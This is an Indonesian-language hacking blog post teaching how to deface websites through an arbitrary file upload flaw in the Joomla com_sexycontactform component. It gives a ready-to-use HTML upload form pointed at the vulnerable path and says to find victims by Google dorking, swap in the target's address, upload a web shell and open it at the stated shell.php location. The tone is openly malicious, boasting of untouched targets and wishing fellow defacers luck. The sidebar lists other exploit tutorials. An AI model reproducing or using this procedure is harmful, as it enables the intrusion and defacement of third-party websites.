• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Deface dengan Exploit Joomla com_sexycontactform Arbitrary File Upload Vulnerability

October 27, 2014 by Jack Wilder Leave a Comment

Oke kali ini mau berbagi exploit yang ane dapet kemaren. Sebenernya masih banyak target perawan sih, tapi berhubung ane mau berhenti dari dunia persilatan ini, wkwkwk . Ane share aja deh tutornya. Semoga bermanfaat bagi yang masih doyan deface.
Oke, pertama, siapin dulu html exploiter nya.
<form method=”POST” action=”http://localhost/components/com_sexycontactform//fileupload/index.php”
enctype=”multipart/form-data”>
<input type=”file” name=”files[]” /><button>Upload</button>
</form>

Simpan dengan format .html
Lalu dorking di google.
Dork : ??
Use ur brain, bitch !!
Victim nya di :
http://localhost/components/com_sexycontactform//fileupload/index.php

kalo udah nemu target , edit html explot nya tadi. ganti http://localhost dengan situs target.

lalu buka file html tadi dengan browser.

ada form upload. Upload shell lewat situ.

Kalo ada semacam notice gak jelas kek jembut gitu tandanya shell sukses di upload.

Shell ada di http://localhost/components/com_sexycontactform//fileupload/files/shell.php

Sekian tutor kali ini, semoga bermanfaat .
Happy Hacking ^_^

Shares

Filed Under: Uncategorized Tagged With: Exploit, Hacking

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Reverse Shell From Local File Inclusion Exploit

Exploit WPStore Themes Upload Vulnerability

Exploit WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability

Bruteforce FTP Login dengan Metasploit Module FTP Authentication Scanner

Deface dengan Metode Timthumb Remote Code Execution

Uptimerobot.com Custom Domain or Subdomain Takeover

Prestashop Module Blocktestimonial File Upload Auto Exploit

Surge.sh Custom Domain or Subdomain Takeover

WordPress Plugin CopySafe PDF Protection Shell Upload

Woocommerce Custom Tshirt Desginer CSRF Shell Upload Vulnerability

LinuxSec / 63 queries in 0.07 seconds